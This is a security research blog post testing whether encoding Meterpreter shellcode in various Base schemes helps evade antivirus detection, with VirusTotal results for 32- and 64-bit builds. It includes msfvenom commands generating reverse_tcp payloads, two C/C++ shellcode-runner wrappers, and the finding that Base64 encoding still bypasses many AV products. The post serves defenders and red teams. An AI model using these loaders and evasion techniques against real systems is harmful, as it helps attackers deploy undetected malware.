All your Base are...nearly equal when it comes to AV evasion, but 64-bit executables are not

Published: 2021-05-27
Last Updated: 2021-05-27 09:28:34 UTC
by Jan Kopriva (Version: 1)

Malware authors like to use a variety of techniques to avoid detection of their creations by anti-malware tools. As the old saying goes, necessity is the mother of invention, and in the case of malware it has led its authors to devise some very interesting ways to hide from detection over the years, from encoding of executable files into valid bitmap images[1] to multi-stage encryption of malicious payloads[2] and much further. Many of these techniques continue to be used effectively in the wild by malicious actors as well as by red teams that emulate them. Probably none of these techniques (perhaps with the exception of simple XOR encryption) has been used as widely as Base64 encoding of malicious payloads.

Base64[3] is among the world’s best-known binary-to-text encodings. It is commonly used to encode binary data so it can be easily transmitted over networks, and most of us use it in one way or another on a daily basis. Since, as we’ve mentioned, so do malicious actors, it is also the “go to” encoding that security analysts tend to try first when looking at data that appears to be encoded in some way (especially if it ends in the telltale equal sign or two). Base64, however, isn’t the only encoding scheme out there, and it isn’t even the only Base-based one (if you forgive the pun).
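As a quick illustration of where the telltale equal signs come from, here is a minimal Python sketch (it is not part of the original test, and the helper name b64_padding is made up for this example). Base64 turns every 3 input bytes into 4 characters, so padding only appears when the input length is not a multiple of 3.

```python
import base64


def b64_padding(data: bytes) -> int:
    """Return how many '=' characters end the Base64 encoding of data."""
    encoded = base64.b64encode(data).decode("ascii")
    return len(encoded) - len(encoded.rstrip("="))


# Harmless sample inputs of 3, 4 and 5 bytes.
for sample in (b"abc", b"abcd", b"abcde"):
    encoded = base64.b64encode(sample).decode("ascii")
    print(len(sample), encoded, b64_padding(sample))
# prints:
# 3 YWJj 0
# 4 YWJjZA== 2
# 5 YWJjZGU= 1
```

In other words, an encoded blob can be perfectly valid Base64 and still end without any equal sign, so missing padding does not rule the encoding out.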

Since it has also been used extensively (for example for data exfiltration using DNS[4]), many are aware that a Base32 encoding scheme also exists. But the story doesn’t end there, and many other, more obscure Base encodings are being used as well. Even if we just look at the encoding schemes supported by CyberChef[5], we can see several others.
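From the analyst’s side, trying several Base decoders on a suspicious string can be sketched roughly as follows. This is only an illustration under a few assumptions: it uses the decoders that ship in Python’s standard base64 module (Base16, Base32, Base64 and one Base85 variant), the names DECODERS and candidate_decodings are made up for this example, and encodings such as Base58 or Base62 would need third-party or hand-written code.

```python
import base64

# Decoders available in the Python standard library. Base58 and Base62
# are not included there and are left out of this sketch.
DECODERS = {
    "Base16": base64.b16decode,
    "Base32": base64.b32decode,
    "Base64": lambda raw: base64.b64decode(raw, validate=True),
    "Base85": base64.b85decode,
}


def candidate_decodings(text: str) -> dict:
    """Return {encoding name: decoded bytes} for every decoder that accepts text."""
    results = {}
    for name, decode in DECODERS.items():
        try:
            results[name] = decode(text.encode("ascii"))
        except ValueError:
            # binascii.Error and UnicodeEncodeError are both ValueError subclasses.
            continue
    return results


if __name__ == "__main__":
    sample = base64.b32encode(b"hello").decode("ascii")
    for name, decoded in candidate_decodings(sample).items():
        print(name, decoded)
```

A string can be valid under more than one alphabet at once, so a successful decode on its own proves little. The decoded bytes still have to be checked for something meaningful.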

The availability of these lesser-known Base encodings in CyberChef led me to an idea. Since Base64 is so prevalent, one might expect most anti-malware tools to be able to easily handle known malicious payloads encoded with it (after all, since YARA is capable of matching Base64-encoded versions of strings[6], why wouldn’t AVs be able to do the same?). Would that, however, hold for the other encodings as well? Or, to put it differently, would it make sense for a malicious actor or red teamer to encode a malicious payload using some other scheme if they were trying to get past an anti-malware scan?
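To show why matching a Base64-encoded string is not a simple one-to-one lookup, the sketch below derives the three forms a plain string can take inside a Base64 stream, depending on whether it starts at byte offset 0, 1 or 2 of a 3-byte group. This is roughly the idea behind searching for Base64-encoded strings, not YARA’s actual implementation, and the function name base64_search_variants is hypothetical.

```python
import base64
from typing import List


def base64_search_variants(needle: bytes) -> List[str]:
    """Return the Base64 substrings that needle produces at each alignment."""
    variants = []
    for offset in range(3):
        # Dummy bytes stand in for whatever precedes the needle in real data.
        padded = b"\x00" * offset + needle
        encoded = base64.b64encode(padded).decode("ascii").rstrip("=")
        # Skip leading characters that also depend on the preceding bytes.
        start = (offset * 8 + 5) // 6
        # Keep only characters fully determined by the known bytes.
        end = (len(padded) * 8) // 6
        variants.append(encoded[start:end])
    return variants


if __name__ == "__main__":
    for variant in base64_search_variants(b"This program cannot"):
        print(variant)
# prints:
# VGhpcyBwcm9ncmFtIGNhbm5vd
# RoaXMgcHJvZ3JhbSBjYW5ub3
# UaGlzIHByb2dyYW0gY2Fubm90
```

A scanner that knows these three variants can find the string in Base64 data without decoding anything. Doing the same for every other Base encoding means a separate set of variants for each, which is the gap the experiment below is probing.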

To find out whether there would be any advantage to using encodings other than Base64 to hide a malicious payload, I devised a simple test. I would generate shellcode that should be identified as malicious by most anti-malware tools on the market, encode it using the different Base encodings supported by CyberChef (all except for Base85), put each encoded “payload” into a shellcode wrapper, compile it and check what detection score the resulting file would have on VirusTotal. To make things a little more comprehensive, I would do this for 32-bit as well as 64-bit executables and payloads.

Admittedly, the results of this little experiment would be far from representative when it comes to the ability of different Base encodings to hide malicious content, but they should be enough to show whether using a scheme other than Base64 could make at least some difference.

The shellcode I decided to use for the test was a simple staged Meterpreter reverse-tcp payload, since this is something that one would expect most anti-malware tools to be able to catch. I generated it with MSFvenom using the following commands.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -a x64 -f c
msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -a x86 -f c

I have put the resulting 32-bit and 64-bit shellcode into the following C++ wrapper from GitHub[7] and compiled it into executable binaries.

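#include <windows.h>
#include <cstring>   // memcpy
#include <iostream>

int main(){
    // [length] and [shellcode] are placeholders for the payload size and bytes.
    static const int code_lenght = [length];
    unsigned char opcodes[code_lenght] = [shellcode];

    // Create an anonymous, pagefile-backed mapping with execute/read/write protection.
    HANDLE mem_handle = CreateFileMappingA( INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0,  code_lenght, NULL);
    // Map a view of it into the process with write and execute access.
    void* mem_map = MapViewOfFile( mem_handle, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0x0, 0x0, code_lenght);
    // Copy the payload into the view and call it as a function returning int.
    memcpy(mem_map, opcodes, sizeof(opcodes));
    std::cout << (( int(*)() )mem_map)() << std::endl;
    return 0;
}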

I then encoded both pieces of shellcode using each of the Base encodings I wanted to try and compiled the resulting code.

I didn’t add any functionality for decoding of the encoded payload, so the resulting executables would not actually cause the embedded shellcode to run if they were executed (instead of valid shellcode, they would try to execute its encoded form, which would of course not work). However, for the purposes of our test, this shouldn’t have made any difference.

In order to identify the number of detections caused by the shellcode wrapper and not the (encoded) shellcode itself, I have also compiled a “control” executable that only contained one NOP instruction as its payload.

I then ran each of the resulting executables through VirusTotal. As you may see from the following chart, there was no significant difference between detections of differently encoded shellcode, or between our control executable and the ones that carried the encoded Meterpreter. All 32-bit executables with encoded shellcode were detected by 1 more AV than the wrapper with the NOP instruction, and only the Base64-encoded 64-bit executable had 1 more detection than the control executable.

Since I found the results a little bit surprising, I decided to try the same test using a different shellcode wrapper. I chose code that tries to execute shellcode using a simple pointer to it. This is a well-known historical technique that wouldn’t work on modern operating systems but should be easily spotted by anti-malware tools.

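#include<stdio.h>
#include<string.h>

/* [shellcode] is a placeholder for the payload bytes. */
unsigned char shellcode[] = [shellcode];

int main(void)
{
    /* Treat the data buffer as a function and call it directly. */
    int (*call)() = (int(*)())shellcode;
    call();
    return 0;
}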

As we can see from the following chart, there was indeed a significant overall increase in the number of detections. Although among the 64-bit executables the number of detections was again nearly the same (8 for Base32 and Base64, 9 for Base58 and Base62 encodings), there were some small differences in detections of 32-bit executables. The two containing shellcode encoded by Base58 and Base62 actually scored lower than our control binary.

Although this variance in the number of detections is interesting, given our other results, it seems that there is generally very little difference between the protection from AV detection that Base64 and the lesser-known Base encodings can provide, at least when it comes to encoding of shellcode.

As we’ve mentioned before, however, the results are hardly representative. They would certainly be quite different if we were to encode some other type of well-known malicious payload than a staged Meterpreter (a stageless Meterpreter or something containing the string “invoke-mimikatz” comes to mind), or if we were to run a similar test using a larger sample size. In general, however, it seems that even a simple Base64 encoding of shellcode is still a viable way to get past many AV solutions out there.

Still, it is good to keep in mind that the available encodings don’t end with Base64, since for red teamers and blue teamers both, the other variants might come in useful from time to time.

What is more surprising than the aforementioned “effectiveness” of Base64 encoding, however, are the significant differences between the detections of 32-bit and 64-bit versions of the same code. Although most of us tend to think that the time when anti-malware solutions struggled with detecting malicious 64-bit code is far behind us, it would seem that this is still not truly the case…

[1] https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/
[2] https://isc.sans.edu/forums/diary/Agent+Tesla+hidden+in+a+historical+antimalware+tool/27088/
[3] https://en.wikipedia.org/wiki/Base64
[4] https://isc.sans.edu/diary/DNS+Query+Length...+Because+Size+Does+Matter/22326
[5] https://gchq.github.io/CyberChef/
[6] https://isc.sans.edu/forums/diary/YARA+v400+BASE64+Strings/26106/
[7] https://gist.github.com/angelorodem/fd3f074a27ddf2708ee74a5ad32704d9

-----------
Jan Kopriva
@jk0pr
Alef Nula

Keywords: Encoding Malware